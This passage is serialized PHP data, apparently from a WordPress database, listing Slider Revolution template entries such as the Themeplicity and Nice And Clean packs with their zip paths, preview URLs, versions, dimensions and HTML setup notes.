href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:115;a:25:{s:2:\"id\";s:3:\"117\";s:5:\"title\";s:21:\"Themeplicity Projects\";s:5:\"alias\";s:21:\"themeplicity_projects\";s:3:\"zip\";s:31:\"packs/themeplicity_projects.zip\";s:3:\"uid\";s:32:\"5f61b3a13033ba6a51a18270163e0a50\";s:3:\"img\";s:32:\"themeplicity_projects/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"813\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:116;a:25:{s:2:\"id\";s:3:\"118\";s:5:\"title\";s:24:\"Themeplicity Whats Great\";s:5:\"alias\";s:23:\"themeplicity_whatsgreat\";s:3:\"zip\";s:33:\"packs/themeplicity_whatsgreat.zip\";s:3:\"uid\";s:32:\"ce9faf8c55ed2e33e091b23667e7173b\";s:3:\"img\";s:34:\"themeplicity_whatsgreat/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"900\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:117;a:25:{s:2:\"id\";s:3:\"119\";s:5:\"title\";s:19:\"Themeplicity Tables\";s:5:\"alias\";s:19:\"themeplicity_tables\";s:3:\"zip\";s:29:\"packs/themeplicity_tables.zip\";s:3:\"uid\";s:32:\"f28bb4cd20ec1f29a1de7da5ad09c293\";s:3:\"img\";s:30:\"themeplicity_tables/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:4:\"1059\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:118;a:25:{s:2:\"id\";s:3:\"120\";s:5:\"title\";s:24:\"Themeplicity Contactform\";s:5:\"alias\";s:24:\"themeplicity_contactform\";s:3:\"zip\";s:34:\"packs/themeplicity_contactform.zip\";s:3:\"uid\";s:32:\"3e59da970f534490774fa8e053f5b5ed\";s:3:\"img\";s:35:\"themeplicity_contactform/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:4:\"1067\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:119;a:25:{s:2:\"id\";s:3:\"121\";s:5:\"title\";s:19:\"Themeplicity Footer\";s:5:\"alias\";s:19:\"themeplicity_footer\";s:3:\"zip\";s:29:\"packs/themeplicity_footer.zip\";s:3:\"uid\";s:32:\"89eeb0b4b852c5f743e1bd76e3e8f2ef\";s:3:\"img\";s:30:\"themeplicity_footer/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"780\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:120;a:25:{s:2:\"id\";s:3:\"122\";s:5:\"title\";s:20:\"Themeplicity Package\";s:5:\"alias\";s:20:\"themeplicity-package\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:20:\"themeplicity-package\";s:3:\"img\";s:38:\"packages/templatepack_themeplicity.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/wordpress-theme/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"5.3.0\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:175:\"<span class=\"ttm_content\">The Themeplicity Website Template uses the new groups & rows feature introduced in 5.3 to its full potential.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:29:\"Themeplicity Website Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"5\";s:9:\"installed\";b:0;}i:121;a:25:{s:2:\"id\";s:3:\"123\";s:5:\"title\";s:19:\"Nice And Clean Menu\";s:5:\"alias\";s:17:\"NiceAndClean_Menu\";s:3:\"zip\";s:27:\"packs/NiceAndClean_Menu.zip\";s:3:\"uid\";s:32:\"3f8c01e26c7446428e045c4b1180776d\";s:3:\"img\";s:28:\"NiceAndClean_Menu/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:2:\"90\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:122;a:25:{s:2:\"id\";s:3:\"124\";s:5:\"title\";s:21:\"Nice And Clean Header\";s:5:\"alias\";s:19:\"NiceAndClean_Header\";s:3:\"zip\";s:29:\"packs/NiceAndClean_Header.zip\";s:3:\"uid\";s:32:\"76931033addb20a62557c2845a4d6a11\";s:3:\"img\";s:30:\"NiceAndClean_Header/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:123;a:25:{s:2:\"id\";s:3:\"125\";s:5:\"title\";s:23:\"Nice And Clean Services\";s:5:\"alias\";s:21:\"NiceAndClean_Services\";s:3:\"zip\";s:31:\"packs/NiceAndClean_Services.zip\";s:3:\"uid\";s:32:\"02f72ec606800c8215bcadea09624e87\";s:3:\"img\";s:32:\"NiceAndClean_Services/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"360\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:124;a:25:{s:2:\"id\";s:3:\"126\";s:5:\"title\";s:20:\"Nice And Clean About\";s:5:\"alias\";s:18:\"NiceAndClean_About\";s:3:\"zip\";s:28:\"packs/NiceAndClean_About.zip\";s:3:\"uid\";s:32:\"9510f6fdbb8e9473e8c22f692a6bc89f\";s:3:\"img\";s:29:\"NiceAndClean_About/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:125;a:25:{s:2:\"id\";s:3:\"127\";s:5:\"title\";s:20:\"Nice And Clean Video\";s:5:\"alias\";s:18:\"niceandclean_video\";s:3:\"zip\";s:28:\"packs/niceandclean_video.zip\";s:3:\"uid\";s:32:\"2bb9e1ad329435cc500542d0c7025e15\";s:3:\"img\";s:29:\"niceandclean_video/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:126;a:25:{s:2:\"id\";s:3:\"128\";s:5:\"title\";s:25:\"Nice And Clean Highlights\";s:5:\"alias\";s:23:\"niceandclean_highlights\";s:3:\"zip\";s:33:\"packs/niceandclean_highlights.zip\";s:3:\"uid\";s:32:\"ff396af163a79d2d5b35db17c1ea7aa6\";s:3:\"img\";s:34:\"niceandclean_highlights/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:127;a:25:{s:2:\"id\";s:3:\"129\";s:5:\"title\";s:23:\"Nice And Clean Projects\";s:5:\"alias\";s:21:\"NiceAndClean_Projects\";s:3:\"zip\";s:31:\"packs/NiceAndClean_Projects.zip\";s:3:\"uid\";s:32:\"1e6695959ef83f8975b52289c08a4d44\";s:3:\"img\";s:32:\"NiceAndClean_Projects/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:3:\"600\";s:6:\"height\";s:3:\"600\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:128;a:25:{s:2:\"id\";s:3:\"130\";s:5:\"title\";s:25:\"Nice And Clean TextBlocks\";s:5:\"alias\";s:23:\"niceandclean_textblocks\";s:3:\"zip\";s:33:\"packs/niceandclean_textblocks.zip\";s:3:\"uid\";s:32:\"1f33eb839c96ea3225faff1c8d382b05\";s:3:\"img\";s:34:\"niceandclean_textblocks/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"800\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:129;a:25:{s:2:\"id\";s:3:\"131\";s:5:\"title\";s:22:\"Nice And Clean CallOut\";s:5:\"alias\";s:20:\"niceandclean_callout\";s:3:\"zip\";s:30:\"packs/niceandclean_callout.zip\";s:3:\"uid\";s:32:\"54d4d9bcf79d357de0e614700e909863\";s:3:\"img\";s:31:\"niceandclean_callout/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"500\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack. </span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:130;a:25:{s:2:\"id\";s:3:\"132\";s:5:\"title\";s:21:\"Nice And Clean Footer\";s:5:\"alias\";s:19:\"niceandclean_footer\";s:3:\"zip\";s:29:\"packs/niceandclean_footer.zip\";s:3:\"uid\";s:32:\"5492d7f72b3771a4e754f91bda063b15\";s:3:\"img\";s:30:\"niceandclean_footer/slide1.jpg\";s:7:\"preview\";s:72:\"https://revolution.themepunch.com/nice-clean-responsive-wordpress-theme/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"400\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:542:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">For using the social sharing buttons, please install the social sharing add-on.<br><br></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:21:\"Nice & Clean Template\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"6\";s:9:\"installed\";b:0;}i:131;a:22:{s:2:\"id\";s:3:\"134\";s:5:\"title\";s:15:\"80s Style Intro\";s:5:\"alias\";s:3:\"80s\";s:3:\"zip\";s:7:\"80s.zip\";s:3:\"uid\";s:32:\"98881ab51f71b2fbdb220752d321b15a\";s:3:\"img\";s:14:\"80s/slide1.jpg\";s:7:\"preview\";s:50:\"https://revolution.themepunch.com/80s-style-intro/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:139:\"<span class=\"ttm_content\">This intro hero block takes you back to the 80\'s with some funky effects.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:317:\"<span class=\"ttm_content\">This is a \"Default\" content hero slider. Just edit the slide to change the background image and text.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:132;a:22:{s:2:\"id\";s:3:\"135\";s:5:\"title\";s:18:\"Blur Effect Slider\";s:5:\"alias\";s:10:\"blurslider\";s:3:\"zip\";s:14:\"blurslider.zip\";s:3:\"uid\";s:32:\"83bd6e1ccef83f03c944fa05b0a2d879\";s:3:\"img\";s:21:\"blurslider/slide1.jpg\";s:7:\"preview\";s:53:\"https://revolution.themepunch.com/blur-effect-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.3.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:147:\"<span class=\"ttm_content\">This slider makes use of the brand new blur effects available with version 5.3.1.</span>\r\n<span 